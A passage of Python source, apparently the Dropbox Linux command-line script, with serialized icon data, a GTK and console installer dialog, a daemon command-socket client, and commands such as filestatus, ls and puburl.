0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', GdkPixbuf.Colorspace.RGB, True, 8, 64, 64, 256)
window_icon = GdkPixbuf.Pixbuf.new_from_data(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff3\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00b\xffN\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe2\x00d\xffO\x00b\xffN\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe2\x00b\xffN\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00d\xffR\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00e\xffQ\x00\x00\x00\x00\x00b\xff\r\x00d\xff\x92\x00c\xff\xfd\x00c\xff\xfd\x00d\xff\x92\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00d\xff\x92\x00c\xff\xfd\x00c\xff\xfd\x00d\xff\x92\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xffe\x00d\xfff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xfff\x00d\xfff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\xff\x0b\x00b\xff\x8c\x00b\xff\xfc\x00b\xff\xfc\x00c\xff\x8d\x00t\xff\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00t\xff\x0b\x00b\xff\x8c\x00b\xff\xfc\x00b\xff\xfc\x00b\xff\x8c\x00t\xff\x0b\x00\x00\x00\x00\x00c\xffK\x00c\xff\xe0\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe1\x00e\xffL\x00e\xffL\x00c\xff\xe1\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe1\x00e\xffL\x00d\xffT\x00c\xff\xe5\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe6\x00c\xffU\x00d\xffT\x00c\xff\xe6\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe6\x00d\xffT\x00\x00\x00\x00\x00m\xff\x0e\x00b\xff\x94\x00c\xff\xfd\x00c\xff\xfd\x00c\xff\x95\x00i\xff\x11\x00c\xffj\x00d\xffk\x00i\xff\x11\x00c\xff\x95\x00c\xff\xfd\x00c\xff\xfd\x00c\xff\x95\x00m\xff\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff7\x00d\xff8\x00d\xff.\x00b\xff\xc8\x00b\xff\xff\x00b\xff\xff\x00b\xff\xc8\x00g\xff/\x00f\xff7\x00f\xff7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\x7f\x00c\xff\xfb\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfb\x00d\xff\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xff \x00b\xff\xb6\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb7\x00d\xff!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffW\x00b\xff\xe7\x00b\xff\xe7\x00d\xffW\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff\x0f\x00p\xff\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', GdkPixbuf.Colorspace.RGB, True, 8, 16, 16, 64)
GUI_AVAILABLE = os.environ.get("DISPLAY", '')
if GUI_AVAILABLE:
def download():
import gi
gi.require_version('Gdk', '3.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GObject
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import Pango
import webbrowser
GObject.threads_init()
load_serialized_images()
global FatalVisibleError
def FatalVisibleError(s):
error = Gtk.MessageDialog(parent = None,
flags = Gtk.DialogFlags.MODAL,
type = Gtk.MessageType.ERROR,
buttons = Gtk.ButtonsType.OK,
message_format = s)
error.set_title("Error")
error.run()
Gtk.main_quit()
sys.exit(-1)
class GeneratorTask(object):
def __init__(self, generator, loop_callback, on_done=None, on_exception=None):
self.generator = generator
self.loop_callback = loop_callback
self.on_done = on_done
self.on_exception = on_exception
def _run(self, *args, **kwargs):
self._stopped = False
try:
for ret in self.generator(*args, **kwargs):
if ret is None:
ret = ()
if not isinstance(ret, tuple):
ret = (ret,)
GObject.idle_add(self.loop_callback, *ret)
if self._stopped:
_thread.exit()
except Exception as e:
print(e)
if self.on_exception is not None:
GObject.idle_add(self.on_exception, e)
else:
if self.on_done is not None:
GObject.idle_add(self.on_done)
def start(self, *args, **kwargs):
t = threading.Thread(target=self._run, args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
def stop(self):
self._stopped = True
class DownloadDialog(Gtk.Dialog):
def handle_delete_event(self, wid, ev, data=None):
self.handle_cancel(wid)
def handle_dont_show_toggle(self, button, data=None):
reroll_autostart(not button.get_active())
def handle_cancel(self, button):
if self.task:
self.task.stop()
if self.download:
self.download.cancel()
Gtk.main_quit()
self.user_cancelled = True
def handle_ok(self, button):
# begin download
self.ok.hide()
self.download = DownloadState()
self.label.hide()
if self.dont_show_again_align is not None:
self.dont_show_again_align.hide()
self.progress.show()
def download_progress(progress, status):
if not status:
self.task.stop()
self.update_progress(DOWNLOADING, progress)
def finished():
self.update_progress(DOWNLOADING, 1.0)
self.unpack_dropbox()
def error(ex):
FatalVisibleError(ERROR_CONNECTING)
self.update_progress(DOWNLOADING, 0)
self.task = GeneratorTask(self.download.copy_data,
download_progress,
finished, error).start()
def update_progress(self, text, fraction):
self.progress.set_text(text % int(fraction*100))
self.progress.set_fraction(fraction)
def unpack_dropbox(self):
def unpack_progress(name, i, total):
self.update_progress(UNPACKING, float(i)/total)
def finished():
self.update_progress(UNPACKING, 1.0)
if not self.download.is_dropbox_valid():
FatalVisibleError(ERROR_INVALID_DROPBOX)
Gtk.main_quit()
def error(ex):
if isinstance(ex, SignatureVerifyError):
FatalVisibleError(ERROR_SIGNATURE)
else:
FatalVisibleError(ERROR_CONNECTING)
self.task = GeneratorTask(self.download.unpack,
unpack_progress,
finished, error).start()
def mouse_down(self, widget, event):
if self.hovering:
self.clicked_link = True
def mouse_up(self, widget, event):
if self.clicked_link:
webbrowser.open(LINK)
self.clicked_link = False
def label_motion(self, widget, event):
offx, offy = self.label.get_layout_offsets()
layout = self.label.get_layout()
index = layout.xy_to_index(int((offx+event.x)*Pango.SCALE),
int((offy+event.y)*Pango.SCALE))[1]
link_index = layout.get_text().find(LINK)
if index >= link_index and index < link_index+len(LINK):
self.hovering = True
self.label_box.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.HAND2))
else:
self.hovering = False
self.label_box.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def __init__(self):
super(DownloadDialog, self).__init__(parent = None,
title = "Dropbox Installation")
self.download = None
self.hovering = False
self.clicked_link = False
self.user_cancelled = False
self.task = None
self.ok = ok = Gtk.Button(stock=Gtk.STOCK_OK)
ok.connect('clicked', self.handle_ok)
self.action_area.add(ok)
ok.show()
cancel = Gtk.Button(stock=Gtk.STOCK_CANCEL)
cancel.connect('clicked', self.handle_cancel)
self.action_area.add(cancel)
cancel.show()
self.connect('delete_event', self.handle_delete_event)
self.box_logo = Gtk.Image.new_from_pixbuf(box_logo_pixbuf)
self.box_logo.show()
self.set_icon(window_icon)
self.progress = Gtk.ProgressBar()
self.progress.set_property('width-request', 300)
self.progress.set_property('show-text', True)
self.label = Gtk.Label()
GPG_WARNING_MSG = ("\n\n" + GPG_WARNING) if not gpg and not gpgme else ""
self.label.set_markup('%s <span foreground="#000099" underline="single" weight="bold">%s</span>\n\n%s%s' % (INFO, LINK, WARNING, GPG_WARNING_MSG))
self.label.set_line_wrap(True)
self.label.set_property('width-request', 300)
self.label.show()
self.label_box = Gtk.EventBox()
self.label_box.add(self.label)
self.label_box.connect("button-release-event", self.mouse_up)
self.label_box.connect("button-press-event", self.mouse_down)
self.label_box.connect("motion-notify-event", self.label_motion)
self.label_box.show()
def on_realize(widget):
self.label_box.add_events(Gdk.EventMask.POINTER_MOTION_MASK)
self.label_box.connect("realize", on_realize)
self.hbox = Gtk.HBox(spacing=10)
self.hbox.set_property('border-width',10)
self.hbox.pack_start(self.box_logo, False, False, 0)
self.hbox.pack_start(self.label_box, False, False, 0)
self.hbox.pack_start(self.progress, False, False, 0)
self.hbox.show()
self.vbox.add(self.hbox)
self.dont_show_again_align = None
try:
if can_reroll_autostart():
dont_show_again = Gtk.CheckButton.new_with_mnemonic("_Don't show this again")
dont_show_again.connect('toggled', self.handle_dont_show_toggle)
dont_show_again.show()
self.dont_show_again_align = Gtk.Alignment(xalign=1.0, yalign=0.0, xscale=0.0, yscale=0.0)
self.dont_show_again_align.add(dont_show_again)
self.dont_show_again_align.show()
hbox = Gtk.HBox()
hbox.set_property('border-width', 10)
hbox.pack_start(self.dont_show_again_align, True, True, 0)
hbox.show()
self.vbox.add(hbox)
self.set_resizable(False)
except:
traceback.print_exc()
self.ok.grab_focus()
dialog = DownloadDialog()
dialog.show()
Gtk.main()
if dialog.user_cancelled:
raise Exception("user cancelled download!!!")
else:
def download():
global FatalVisibleError
def FatalVisibleError(s):
console_print("\nError: %s" % s, f=sys.stderr)
sys.exit(-1)
ESC = "\x1b"
save = ESC+"7"
unsave = ESC+"8"
erase_to_start = ESC+"[1K"
write = sys.stdout.write
flush = sys.stdout.flush
last_progress = [None, None]
def setprogress(text, frac):
if last_progress == [text, frac]:
return
if sys.stdout.isatty():
write(erase_to_start)
write(unsave)
console_print(text % int(100*frac), linebreak=not sys.stdout.isatty())
if sys.stdout.isatty():
flush()
last_progress[0], last_progress[1] = text, frac
console_print()
if sys.stdout.isatty():
write(save)
flush()
console_print("%s %s\n" % (INFO, LINK))
GPG_WARNING_MSG = ("\n%s" % GPG_WARNING) if not gpg and not gpgme else ""
if not yes_no_question("%s%s" % (WARNING, GPG_WARNING_MSG)):
return
download = DownloadState()
try:
for progress, status in download.copy_data():
if not status:
break
setprogress(DOWNLOADING, progress)
except Exception:
traceback.print_exc()
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(DOWNLOADING, 1.0)
console_print()
write(save)
try:
for _, i, total in download.unpack():
setprogress(UNPACKING, float(i)/total)
except SignatureVerifyError:
traceback.print_exc()
FatalVisibleError(ERROR_SIGNATURE)
except Exception:
traceback.print_exc()
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(UNPACKING, 1.0)
if not download.is_dropbox_valid():
FatalVisibleError(ERROR_INVALID_DROPBOX)
console_print()
class CommandTicker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
def stop(self):
self.stop_event.set()
def run(self):
ticks = ['[. ]', '[.. ]', '[...]', '[ ..]', '[ .]', '[ ]']
i = 0
first = True
while True:
self.stop_event.wait(0.25)
if self.stop_event.isSet(): break
if i == len(ticks):
first = False
i = 0
if not first:
sys.stderr.write("\r%s\r" % ticks[i])
sys.stderr.flush()
i += 1
sys.stderr.flush()
class DropboxCommand(object):
class CouldntConnectError(Exception): pass
class BadConnectionError(Exception): pass
class EOFError(Exception): pass
class CommandError(Exception): pass
def __init__(self, timeout=5):
self.s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.s.settimeout(timeout)
try:
self.s.connect(os.path.expanduser('~/.dropbox/command_socket'))
except socket.error:
raise DropboxCommand.CouldntConnectError()
self.f = self.s.makefile("rw", 4096)
def close(self):
self.f.close()
self.s.close()
def __readline(self):
try:
toret = self.f.readline().rstrip("\n")
except socket.error:
raise DropboxCommand.BadConnectionError()
if toret == '':
raise DropboxCommand.EOFError()
else:
return toret
# atttribute doesn't exist, i know what you want
def send_command(self, name, args):
self.f.write(name)
self.f.write("\n")
self.f.writelines(("\t".join([k] + ([v]
if isinstance(v, str) else
list(v))) + "\n")
for k,v in args.items())
self.f.write("done\n")
self.f.flush()
# Start a ticker
ticker_thread = CommandTicker()
ticker_thread.start()
# This is the potentially long-running call.
try:
ok = self.__readline() == "ok"
except KeyboardInterrupt:
raise DropboxCommand.BadConnectionError("Keyboard interruption detected")
finally:
# Tell the ticker to stop.
ticker_thread.stop()
ticker_thread.join()
if ok:
toret = {}
for i in range(21):
if i == 20:
raise Exception("close this connection!")
line = self.__readline()
if line == "done":
break
argval = line.split("\t")
toret[argval[0]] = argval[1:]
return toret
else:
problems = []
for i in range(21):
if i == 20:
raise Exception("close this connection!")
line = self.__readline()
if line == "done":
break
problems.append(line)
raise DropboxCommand.CommandError("\n".join(problems))
# this is the hotness, auto marshalling
def __getattr__(self, name):
try:
return super(DropboxCommand, self).__getattr__(name)
except:
def __spec_command(**kw):
return self.send_command(str(name), kw)
self.__setattr__(name, __spec_command)
return __spec_command
commands = {}
aliases = {}
def command(meth):
global commands, aliases
assert meth.__doc__, "All commands need properly formatted docstrings (even %r!!)" % meth
if hasattr(meth, 'im_func'): # bound method, if we ever have one
meth = meth.im_func
commands[meth.__name__] = meth
meth_aliases = [str(alias) for alias in aliases.keys() if aliases[alias].__name__ == meth.__name__]
if meth_aliases:
meth.__doc__ += "\nAliases: %s" % ",".join(meth_aliases)
return meth
def alias(name):
def decorator(meth):
global commands, aliases
assert name not in commands, "This alias is the name of a command."
aliases[name] = meth
return meth
return decorator
def requires_dropbox_running(meth):
def newmeth(*n, **kw):
if is_dropbox_running():
return meth(*n, **kw)
else:
console_print("Dropbox isn't running!")
newmeth.__name__ = meth.__name__
newmeth.__doc__ = meth.__doc__
return newmeth
def start_dropbox():
if os.access(DROPBOXD_PATH, os.X_OK):
f = open("/dev/null", "w")
# Fix indicator icon and menu on Unity environments. (LP: #1559249)
# Fix indicator icon and menu in Budgie environment. (LP: #1683051)
new_env = os.environ.copy()
current_env = os.environ.get("XDG_CURRENT_DESKTOP", '').split(":")
to_check = ['Unity', 'Budgie']
if any(word in to_check for word in current_env):
new_env['XDG_CURRENT_DESKTOP'] = 'Unity'
# we don't reap the child because we're gonna die anyway, let init do it
subprocess.Popen([DROPBOXD_PATH], preexec_fn=os.setsid, cwd=os.path.expanduser("~"),
stderr=sys.stderr, stdout=f, close_fds=True, env=new_env)
# in seconds
interval = 0.5
wait_for = 60
for _ in range(int(wait_for / interval)):
if is_dropbox_running():
return True
# back off from connect for a while
time.sleep(interval)
return False
else:
return False
# Extracted and modified from os.cmd.Cmd
def columnize(list, display_list=None, display_width=None):
if not list:
console_print("<empty>")
return
non_str = [i for i in range(len(list)) if not (isinstance(list[i], str))]
if non_str:
raise TypeError("list[i] not a string for i in %s" %
", ".join(map(str, non_str)))
if not display_width:
d = os.popen('stty size', 'r').read().split()
if d:
display_width = int(d[1])
else:
for item in list:
console_print(item)
return
if not display_list:
display_list = list
size = len(list)
if size == 1:
console_print(display_list[0])
return
for nrows in range(1, len(list)):
ncols = (size+nrows-1) // nrows
colwidths = []
totwidth = -2
for col in range(ncols):
colwidth = 0
for row in range(nrows):
i = row + nrows*col
if i >= size:
break
x = list[i]
colwidth = max(colwidth, len(x))
colwidths.append(colwidth)
totwidth += colwidth + 2
if totwidth > display_width:
break
if totwidth <= display_width:
break
else:
nrows = len(list)
ncols = 1
colwidths = [0]
lines = []
for row in range(nrows):
texts = []
display_texts = []
for col in range(ncols):
i = row + nrows*col
if i >= size:
x = ""
y = ""
else:
x = list[i]
y = display_list[i]
texts.append(x)
display_texts.append(y)
while texts and not texts[-1]:
del texts[-1]
original_texts = texts[:]
for col in range(len(texts)):
texts[col] = texts[col].ljust(colwidths[col])
texts[col] = texts[col].replace(original_texts[col], display_texts[col])
line = " ".join(texts)
lines.append(line)
for line in lines:
console_print(line)
@command
def update(args):
"""download latest version of Dropbox
dropbox update
Downloads the latest version of Dropbox. This should not be required
normally, as Dropbox automatically updates itself.
"""
download()
@command
@requires_dropbox_running
@alias('stat')
def filestatus(args):
"""get current sync status of one or more files
dropbox filestatus [-l] [-a] [FILE]...
Prints the current status of each FILE.
options:
-l --list Prints out information in a format similar to ls. Works best when your console supports color :)
-a --all Do not ignore entries starting with "."
"""
global enc
oparser = optparse.OptionParser()
oparser.add_option("-l", "--list", action="store_true", dest="list")
oparser.add_option("-a", "--all", action="store_true", dest="all")
(options, args) = oparser.parse_args(args)
try:
with closing(DropboxCommand()) as dc:
if options.list:
# Listing.
# Separate directories from files.
if len(args) == 0:
dirs, nondirs = ["."], []
else:
dirs, nondirs = [], []
for a in args:
try:
(dirs if os.path.isdir(a) else nondirs).append(a)
except UnicodeDecodeError:
continue
if len(dirs) == 0 and len(nondirs) == 0:
#TODO: why?
exit(1)
dirs.sort(key=methodcaller('lower'))
nondirs.sort(key=methodcaller('lower'))
# Gets a string representation for a path.
def path_to_string(file_path):
if not os.path.exists(file_path):
path = "%s (File doesn't exist!)" % os.path.basename(file_path)
return (path, path)
try:
status = dc.icon_overlay_file_status(path=file_path).get('status', [None])[0]
except DropboxCommand.CommandError as e:
path = "%s (%s)" % (os.path.basename(file_path), e)
return (path, path)
env_term = os.environ.get('TERM','')
supports_color = (sys.stderr.isatty() and (
env_term.startswith('vt') or
env_term.startswith('linux') or
'xterm' in env_term or
'color' in env_term
)
)
# TODO: Test when you don't support color.
if not supports_color:
path = os.path.basename(file_path)
return (path, path)
if status == "up to date":
init, cleanup = "\x1b[32;1m", "\x1b[0m"
elif status == "syncing":
init, cleanup = "\x1b[36;1m", "\x1b[0m"
elif status == "unsyncable":
init, cleanup = "\x1b[41;1m", "\x1b[0m"
elif status == "selsync":
init, cleanup = "\x1b[37;1m", "\x1b[0m"
else:
init, cleanup = '', ''
path = os.path.basename(file_path)
return (path, "%s%s%s" % (init, path, cleanup))
# Prints a directory.
def print_directory(name):
clean_paths = []
formatted_paths = []
for subname in sorted(os.listdir(name), key=methodcaller('lower')):
if type(subname) != str:
continue
if not options.all and subname[0] == '.':
continue
try:
clean, formatted = path_to_string(os.path.abspath(os.path.join(name, subname)))
clean_paths.append(clean)
formatted_paths.append(formatted)
except (UnicodeEncodeError, UnicodeDecodeError):
continue
columnize(clean_paths, formatted_paths)
try:
if len(dirs) == 1 and len(nondirs) == 0:
print_directory(dirs[0])
else:
nondir_formatted_paths = []
nondir_clean_paths = []
for name in nondirs:
try:
clean, formatted = path_to_string(os.path.abspath(name))
nondir_clean_paths.append(clean)
nondir_formatted_paths.append(formatted)
except (UnicodeEncodeError, UnicodeDecodeError):
continue
if nondir_clean_paths:
columnize(nondir_clean_paths, nondir_formatted_paths)
if len(nondirs) == 0:
console_print(dirs[0] + ":")
print_directory(dirs[0])
dirs = dirs[1:]
for name in dirs:
console_print()
console_print(name + ":")
print_directory(name)
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
else:
if len(args) == 0:
args = [name for name in sorted(os.listdir("."), key=methodcaller('lower')) if type(name) == str]
if len(args) == 0:
# Bail early if there's nothing to list to avoid crashing on indent below
console_print("<empty>")
return
indent = max(len(st)+1 for st in args)
for file in args:
try:
if type(file) is not str:
file = file.decode(enc)
fp = os.path.abspath(file)
except (UnicodeEncodeError, UnicodeDecodeError):
continue
if not os.path.exists(fp):
console_print("%-*s %s" % \
(indent, file+':', "File doesn't exist"))
continue
try:
status = dc.icon_overlay_file_status(path=fp).get('status', ['unknown'])[0]
console_print("%-*s %s" % (indent, file+':', status))
except DropboxCommand.CommandError as e:
console_print("%-*s %s" % (indent, file+':', e))
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def ls(args):
"""list directory contents with current sync status
dropbox ls [FILE]...
This is an alias for filestatus -l
"""
return filestatus(["-l"] + args)
@command
@requires_dropbox_running
def puburl(args):
"""get public url of a file in your Dropbox's public folder
dropbox puburl FILE
Prints out a public url for FILE (which must be in your public folder).
"""
if len(args) != 1:
console_print(puburl.__doc__,linebreak=False)
return
try:
with closing(DropboxCommand()) as dc:
try:
console_print(dc.get_public_link(path=os.path.abspath(args[0])).get('link', ['No Link'])[0])
except DropboxCommand.CommandError as e:
